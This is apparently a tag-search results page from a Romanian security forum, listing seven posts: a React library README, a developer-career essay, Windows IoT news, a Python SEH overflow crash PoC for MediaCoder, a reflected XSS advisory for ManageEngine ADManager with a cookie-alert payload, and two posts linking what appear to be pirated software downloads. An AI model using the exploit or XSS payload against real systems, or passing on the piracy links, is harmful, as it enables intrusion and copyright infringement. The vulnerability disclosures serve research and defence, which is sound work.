Jump to content

Search the Community

Showing results for tags 'build'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 7 results

  1. @hocs A collection of Higher-Order Components for React, especially useful with Recompose. A Higher-Order Component is a function that takes a component and returns a new component. Packages omit-props Helps to omit unnecessary context, state setters or anything else you don't want to propagate with {...spread}. with-lifecycle Provides a handy way to use some of React Component Lifecycle methods. with-match-media-props Dynamically map CSS Media Queries matches to boolean props using window.matchMedia() (Can I use?). debounce-handler Helps to debounce handlers like onChange. throttle-handler Helps to throttle handlers like onChange. prevent-handlers-default Decouples e.preventDefault() side effect from handlers like form submitting or clicking a link. …and more to come You can follow me on Twitter for updates. Development Create a new folder in packages/, let's say with-foo. See package.json in already existing packages and create new with-foo/package.json. Put source code in with-foo/src/, it will be transpiled and bundled into with-foo/dist/, with-foo/lib/ and with-foo/es/. Put tests written with Jest in with-foo/test/. Put demo in with-foo/demo/, it will be rendered and wrapped with HMR. Available scripts using Start: yarn start build <package> yarn start demo <package> yarn start test yarn start testWatch yarn start lint Download hocs-master.zip Source: https://github.com/deepsweet/hocs
  2. Am dat peste un raspuns destul de elaborat si bine construit / argumentat si m-am gandit sa il shareuiesc pentru ca poate schimba perspectiva multor useri de p-aici. ( asta daca stiu engleza, desigur ) Argh. No. We really need to stop with the current internet-penis-size mentality around algorithm skills. Yes, testing for basic algorithmic knowledge is an excellent interview shit-test to weed out people that have absolutely no business writing code, but other than that has very little to do with the job of being a software developer. You can spend all bloody day churning out bug-free code with perfect linear time complexity at laser-finger speed, but you might still be a totally shitty developer. We are not athletes or musicians that perform on stage - we are engineers. Our job is to build things. More specifically, (1) build the right things, that (2) work as expected, are (3) easily maintainable for a year or two, and (4) built within reasonable time-frames. This is sort of how I spend my time at work: 40% Talking about WHAT to build. Communication about requirements is by far the most complex, important, and time-consuming aspect of software development. This includes negotiating them, measuring success of them, preventing feature creep from entering the backlog, prioritizing work, how to evolve the architecture instead of just welding the feature on top of it, convincing your product owner that you need to deal with technical debt, and another billion things. If you don't get this right, it will fail your project no matter how good you are at the other stuff. 40% Diving through other peoples code. It is absolutely crucial to be able to absorb other peoples code correctly and quickly, so that you'll make changes that fit (1) in the architecture and (2) don't break existing functionality. It's even more important that you are able to GENERATE code that is easy to understand and absorb, or you'll be a sort of "time cancer" for the team that constantly produces more and more code that wastes more and more time for people to read and understand. I don't care if a programmer has 200 in IQ - if she neglects writing unit tests (the best kind of code documentation), he's GOING to be a detriment for the team, not an asset. 15% Hunting down existing bugs and performance bottlenecks. This has very little to do with algorithmic skills, because humans cannot "look" at 500 000 lines of code and see what is wrong. You need the skillset to methodically narrow down your suspects until you've found the offending method, which usually takes a lot of methodical patience. Once you actually find WHERE the bug/bottleneck resides, it's almost always easy to fix and doesn't require algorithmic genius. 4% Writing actual, new functionality. 1% (and I'm being generous here) Thinking about the time complexity of things. In conclusion: When interviewing, by all means, do a little bit of algorithms just to make sure that the candidate can code, but primarily look at if the person has actually gotten shit done, in a team, in the past.
  3. Windows 10 has all kinds of great stuff going on under the hood, but one of the most intriguing things is a special version designed for the Raspberry Pi 2 and Arduino-certified boards. You can check out that version right now. All the Important Stuff Microsoft Announced at Build 2015 Today Today, Microsoft held its (mostly boring!) developer keynote at Build 2015. If you’re not a… Read more The Windows 10 IoT Core Insider developer preview works with the Raspberry Pi 2, MinnowBoard Max, and Intel Galileo. It’ll also interface with other Arduino boards through a Windows Remote and Windows Virtual Shields. As you’d expect, the software’s a little rough around the edges, but the Windows Dev Center has a bunch of projects to get you familiar with the software. You can sign up for the developer preview and download the newest build for free at the link below. Develop Windows IoT Apps | Windows Dev Center via Windows Blog Source: LifeHacker
  4. # Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst) # Date: 11/29/2010 # Author: Hadji Samir s-dz@hotmail.fr # Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe # Version: 0.8.33 build 5680 EAX 0012E788 ECX 43434343 EDX 00000000 EBX 43434343 ESP 0012E724 EBP 0012E774 ESI 0012E788 EDI 00000000 #!/usr/bin/python buffer = ("http://" + "A" * 845) nseh = ("B" * 4) seh = ("C" * 4) junk = ("D" * 60) f= open("exploit.lst",'w') f.write(buffer + nseh + seh + junk) f.close() Source: http://www.exploit-db.com/exploits/35531/
  5. ##################################### Title:- Reflected cross-site scripting(XSS) Vulnerability in Manage Engine AD Audit Manager Plus Admin Panel(Build 6270) Author: Harish Ramadoss - Help AG Middle East Vendor: ZOHO Corp Product: Manage Engine AD Audit Manager Plus Version: All versions below Build 6270 are mostly affected Tested Version: Build 6270 Severity: Medium CVE Reference: CVE-2015-1026 # About the Product: ADManager Plus is a Windows Active Directory Management and Reporting Solution that helps AD Administrators and Help Desk Technicians with their day-to-day activities. The software handles a variety of complex tasks like Bulk Management of User accounts and other AD objects, Delegate Role based access to Help Desk Technicians, and generates an exhaustive list of AD Reports, # Description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks. # Vulnerability Class: Reflected cross-site scripting(XSS) - hhttps://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 # How to Reproduce: (POC): 1. “technicianSearchText” parameter is vulnerable to XSS on “Help Desk Technician” page. The page can be found at : AD Delegation -> Help Desk Technician 2. "rolesSearchText" parameter is vulnerable to XSS on “Help Desk Roles” page. The page can be found at : AD Delegation -> Help Desk Roles Proof of Concept code to test XSS : <b onmouseover=alert(document.cookie)>Hover over me!</b> # Disclosure: Discovered: December 08, 2014 Vendor Notification: Jan 22, 2015 Public Disclosure: Mar 10, 2015 # Affected Targets: All versions below Build 6270 are mostly affected. On all platforms (Actually platform doesn't affect the issue). # credits: Harish Ramadoss Information Security Analyst Help AG Middle East #References: [1] help AG middle East http://www.helpag.com/. [2] https://www.manageengine.com/products/ad-manager/ [4] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29(XSS) [5] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. Source
  6. ArchiCAD 18 Build 4006 for Windows ArchiCAD 18 Build 4006 for Windows | 1.07 GB ArchiCAD is a complete design suite with 2D and 3D drafting, visualization and other functions for architects, designers and planners. A wide range of software applications are integrated in ArchiCAD to cover most of the design needs of an architectural office: [*]2D CAD software ? drawing tools for creating accurate and detailed technical drawings [*]3D Modeling software ? a 3D CAD interface specially developed for architects capable of creating various kind of building forms [*]Architectural rendering and Visualization software ? a high performance rendering tool to produce photorealistic pictures or videos [*]Desktop publishing software ? with similar features to mainstream DTP software to compose printed materials using technical drawings pixel-based images and texts [*]Document management tool ? a central data storage server with remote access, versioning tool with backup and restore features [*]Building information modeling software ? not just a collection of the above-mentioned applications with an integrated user interface but a novel approach to building design called BIM DOWNLOAD LINKS: http://u22088411.letitbit.net/download/67476.65570a6d8f5cf69af5abf315f851/ArchiCAD-18-build-4006.part1.rar.html http://u22088411.letitbit.net/download/79383.72903e7e7f763006e101927a047a/ArchiCAD-18-build-4006.part2.rar.html http://u22088411.letitbit.net/download/29022.26fd03882ff11659f7214f573c9e/ArchiCAD-18-build-4006.part3.rar.html http://u22088411.letitbit.net/download/12396.15fae155de7cde4e9192741eb01a/ArchiCAD-18-build-4006.part4.rar.html http://u22088411.letitbit.net/download/93447.99db19e6b3021d29aa73f2ede8aa/ArchiCAD-18-build-4006.part5.rar.html http://rapidgator.net/file/17228d89bb13eebe973343603d0b495b/ArchiCAD-18-build-4006.part1.rar.html http://rapidgator.net/file/4c627b237a80045d4a48c9baf97fd324/ArchiCAD-18-build-4006.part2.rar.html http://rapidgator.net/file/b8a25ba77f875799ad56e6e6da7aaee2/ArchiCAD-18-build-4006.part3.rar.html http://rapidgator.net/file/cb2e5dbe0f0491a9c4609f0417864031/ArchiCAD-18-build-4006.part4.rar.html http://rapidgator.net/file/7d547e6be17439063c0864c882239bf7/ArchiCAD-18-build-4006.part5.rar.html http://uploaded.net/file/55g8solr/ArchiCAD-18-build-4006.part1.rar http://uploaded.net/file/ke7p6jr2/ArchiCAD-18-build-4006.part2.rar http://uploaded.net/file/mfpnigr6/ArchiCAD-18-build-4006.part3.rar http://uploaded.net/file/vsirdxhg/ArchiCAD-18-build-4006.part4.rar http://uploaded.net/file/84kycd35/ArchiCAD-18-build-4006.part5.rar http://u18391561.shareflare.net/download/46260.48de6820067ce5a9c847c941386d/ArchiCAD-18-build-4006.part1.rar.html http://u18391561.shareflare.net/download/99211.9ba0d3bf642d469cef880e298b2e/ArchiCAD-18-build-4006.part2.rar.html http://u18391561.shareflare.net/download/98547.988253fee7bfc7e8c58dfb9876ea/ArchiCAD-18-build-4006.part3.rar.html http://u18391561.shareflare.net/download/90180.97ae509f7afe421a0925c90f988c/ArchiCAD-18-build-4006.part4.rar.html http://u18391561.shareflare.net/download/15962.1e4ff0f3b4129e4fce93cff4001e/ArchiCAD-18-build-4006.part5.rar.html
  7. NewBlue TotalFX v3.0 build 140213 WiN64-VR NewBlue TotalFX v3.0 build 140213 WiN64-VR | 1.40 GB NewBlue TotalFX - This all-encompassing series of software plugins work natively with your NLE of choice and includes all of our creative, transition, and essential collections, plus our titling and color correcting tools. Use any one of the over 200 plugins and over 2,000 presets found in the collections below to transform your footage with practically limitless creative possibilities. - cFX Creative Seriesc. FX gives you 47 artistic plugins and hundreds of design presets to transform regular footage into visually stimulating works of video art. Create the old school look of film, manipulate light and apply a virtual artists brush with cFX. - eFX Essentials Series. This premier video editors dream collection helps you create dynamic visual stories with ease. Create a vignette, fix color, split screens, smooth skin, selectively focus subjects, and much, much more with eFX. - tFX Transitions Series. Get 68 specialized video editing plugins to transform your scenes with 3D, artistic and luminary style. Apply any of 800 presets and limitless customizable options to easily and powerfully pass viewers from one scene to the next. - NewBlue ColorFast is an integrated plugin that streamlines both color correction and color grading in one simple workflow. With our Spectra Color Isolating Technology, you get precise control over color adjustments. Work in precise regions or create the look you want across your entire video image. Youll get the artistic results you want in a fraction of the time. - NewBlue Titler Pro 2.0 takes the ground-breaking efficiency of the original Titler Pro and adds stunning visual appeal and sophistication. With the addition of custom lights, bevels and additional texture options, the perfect look can be dialed in. Through a simple and intuitive interface tap into rich styles and dynamic animations which will enliven your production, while avoiding the time and learning curve necessary in other titling solutions. TotalFX includes: - Titler Pro 2.0 - 3D Explosions - 3D Transformations - Art Blends - Art Effects - ColorFast - Film Effects - Light Blends - Light Effects - Motion Blends - Motion Effects - Paint Blends - Paint Effects - Video Essentials I, II, III, IV, V, VI Video Editing Host Compatibility - Adobe Premiere Elements 3.0 - Adobe Premiere Pro CS4, CS5/5.5, CS6/6.5 - Avid Media Composer & Symphony 5, 6/6.5 - Avid Studio - Corel Video Studio X2+ - Grass Valley Edius 4, 5/5.5, 6/6.5 - MAGIX Movie Edit Pro/Plus /Premium 17 - Pinnacle Studio 10 + - Sony Vegas Pro 9, 10, 11, 12 (32-bit/64-bit OpenFX/DirectX) - Sony Vegas Movie Studio 9, 10, 11, 12 (32-bit/64-bit OpenFX/DirectX) Works in CPU mode. System Requirements: - Microsoft Windows XP (SP 3 or later) - Windows Vista (SP 2 or later), or Windows 7 - 1 GHz processor (multicore or multiprocessor CPU recommended for HD) - OpenGL 2.1-capable graphics card and minimum 256MB graphics memory. - 512MB or higher recommended for HD (Radeon HD 2400, GeForce 8600, GeForce 120 or Quadro FX 4500 or better. Intel HD Graphics not supported) - 200 MB hard-disk space for installation - 1 GB RAM (2 GB RAM recommended for HD) DOWNLOAD LINKS: http://u19822771.letitbit.net/download/17165.1ab981433a1b952d4214ea26393e/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part1.rar.html http://u19822771.letitbit.net/download/96826.9f81088ca76c3f69dd75a6e0905e/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part2.rar.html http://u19822771.letitbit.net/download/79393.7b6d77f55951728a27ac517d0b4f/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part3.rar.html http://u19822771.letitbit.net/download/39903.3e270a7e6225ed55484ccb4a6960/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part4.rar.html http://rapidgator.net/file/a2950b2f8ca6c3590e6fea002b4ad34a/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part1.rar.html http://rapidgator.net/file/cbef1fa07df36adc90de4ace736ba8f0/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part2.rar.html http://rapidgator.net/file/0c53b5d691f9f7255a2bf11fcb1869e5/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part3.rar.html http://rapidgator.net/file/49dc9f84b5072e3649dd146f07b7bdae/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part4.rar.html http://www.uploadable.ch/file/ZUG53Nxt8b4W/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part1.rar http://www.uploadable.ch/file/bqdzs4tY8e7X/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part2.rar http://www.uploadable.ch/file/fD2j4ZYUVeTx/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part3.rar http://www.uploadable.ch/file/AQFgdd4EaUXk/72.NewBlue.TotalFX.v3.0.build.140213.WiN64.part4.rar
×
×
  • Create New...